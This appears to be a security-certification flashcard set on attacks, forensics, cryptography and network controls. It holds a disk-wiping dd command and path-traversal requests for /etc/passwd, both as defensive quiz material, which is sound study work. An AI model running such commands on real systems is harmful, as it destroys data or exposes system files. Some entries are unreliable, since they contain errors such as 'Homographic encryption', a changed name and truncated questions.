Web application scanning External assessments of a network perimeter
Which statements describe why devices on an enterprise network should disable Wi-Fi tethering? (Select all that apply.)
Wi-Fi tethering functionality can circumvent data loss prevention measures. Wi-Fi tethering functionality can circumvent web content filtering policies.
Kristen executes the following command on a system. What has she accomplished? dd if=/dev/zero of=/dev/sda bs=4096
Writing zeroes to all of /dev/sda
What term is used to describe the general concept of " anything as a service " ?
Xaas
ARP poisoning
an attack that convinces the network that the attacker's MAC address is the one associated with an allowed address so that traffic is wrongly sent to the attacker's machine. ex spoofing, dos etc
A commercial cyber-threat intelligence organization observes IoCs across a variety of unrelated customers. Prior to releasing specific threat intelligence to other paid subscribers, the organization is MOST likely obligated by contracts to:
anonymize any PII that is observed within the IoC data.
Tom is responsible for VPN connections in his company. His company uses IPSec for VPNs. What is the primary purpose of AH in IPSec?
auth entire packet
Which of the following is NOT a typical concern for cloud firewall designs?
hardware access for updates
Kristen is preparing to acquire data from various devices and systems that are targets in a forensic investigation. Which of the following devices is the least volatile according to the order of volatility?
backups
During a penetration test, an adversary operator sends an encrypted message embedded in an attached image. Analyze the scenario to determine what security principles the operator is relying on to hide the message. (Select all that apply.)
confidentiality security by obscurity
A malicious actor recently penetrated a company's network and moved laterally to the datacenter. Upon investigation, a forensics firm wants to know what was in the memory on the compromised server. Which of the following files should be given to the forensics firm?
dump
PEAP (Protected Extensible Authentication Protocol)
encapsulates EAP with encrypted TLS tunnel
web application to see if it is handling input validation and data validation properly. Which testing method would be most effective for this?
fuzzing
Which of the following BEST describes the method a security analyst would use to confirm a file that is downloaded from a trusted security website is not altered in transit or corrupted using a verified checksum?
hashing
A security analyst is reviewing output of a web server log and notices the following coming from a single source IP: GET /uri/input.action?query=%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.0 GET /uri/input.action?query=/../../../etc/passwd HTTP/1.0 Which of the following actions would MOST likely prevent this attack from occurring?
input validation
Change management
involves careful planning, with consideration for how the change will affect dependent components. For most significant or major changes, organizations should attempt to trial the change first.
Pulverizing
involves destroying media by impact. It is important to note that hitting a hard drive with a hammer can actually leave a surprising amount of recoverable data. Industrial machinery should perform this type of destruction.
Asynchronous replication
is not a good choice for a solution that requires data in multiple locations to be consistent. Asynchronous replication writes data to the primary storage first and then copies the data to the replicas at scheduled intervals. The engineers need to look into the schedules.
Persistence
is the tester's ability to reconnect to the compromised host and use it as a remote access tool (RAT) or backdoor.
Control diversity
layers of controls should combine different classes of technical and administrative controls with the range of control functions.
A public relations team will be taking a group of guests on a tour through the facility of a large e-commerce company. The day before the tour, the company sends out an email to employees to ensure all whiteboards are cleaned and all desks are cleared. The company is MOST likely trying to protect against:
loss of proprietary information
Which security related phrase relates to the integrity of data?
modification
What type of attack is an SSL stripping attack?
on-path
which of the following types of attack does an attacker's system appear to be the server to the real client and appear to be the client to the real server?
on-path
A security analyst is performing a forensic investigation involving compromised account credentials. Using the Event Viewer, the analyst was able to detect the following message: "Special privileges assigned to new logon." Several of these messages did not have a valid logon associated with the user before these privileges were assigned. Which of the following attacks is MOST likely being detected?
pass the hash
Homographic encryption
patient privacy keeps info secure and allows for analyzation of info for study.
Caleb, a starving graduate student, receives an email stating he won the lottery. The email includes a link that requests a name, mobile phone number, address, and date of birth be provided to confirm Joe's identity before sending him the prize. Which of the following BEST describes this type of email?
phishing
Which of the following types of controls is a turnstile?
physical
What type of attack involves adding an expression or phrase such as adding "SAFE" to mail headers?
prepending
Rootkit
program that hides in a computer and allows someone from a remote location to take full control of the computer
Kristen has discovered that a web application used by her company does not always handle multithreading properly, particularly when multiple threads access the same variable. This could allow an attacker who discovered this vulnerability to exploit it and crash the server. What type of error has Kristen discovered?
race condition
A company is instituting role-based training. Which type of training will the company require the data owner to most likely complete?
raining on compliance issues and data classification systems
Which of the following is a team of people dedicated to testing the effectiveness of organizational security programs by emulating the techniques of potential attackers?
red team
On which of the following is the live acquisition of data for forensic analysis MOST dependent? (Choose two.)
right to audit clauses value and volatility of data
The IT department at a university is concerned about professors placing servers on the university network in an attempt to bypass security controls. Which of the following BEST represents this type of threat?
shadow IT
While investigating a malware outbreak on your company network, you discover something very odd. There is a file that has the same name as a Windows system DLL, and it even has the same API interface, but it handles input very differently, in a manner to help compromise the system, and it appears that applications have been attaching to this file, rather than the real system DLL. What best describes this?
shimming
A user received an SMS on a mobile phone that asked for bank details. Which of the following social-engineering techniques was used in this case?
smishing
configured a virtual private network (VPN) so that traffic destined for systems on her corporate network is routed over the VPN but traffic sent to other destinations is sent out via the VPN user's local network. What is this configuration called?
split tunnel
A security analyst is using a recently released security advisory to review historical logs, looking for the specic activity that was outlined in the advisory. Which of the following is the analyst doing?
threat hunting
When a multithreaded application does not properly handle various threads accessing a common value, and one thread can change the data while another thread is relying on it, what flaw is this?
time of check/use
Company engineers regularly participate in a public Internet forum with other engineers throughout the industry. Which of the following tactics would an attacker MOST likely use in this scenario?
watering-hole attack
A security assessment determines DES and 3DES are still being used on recently deployed production servers. Which of the following did the assessment identify?
weak encryption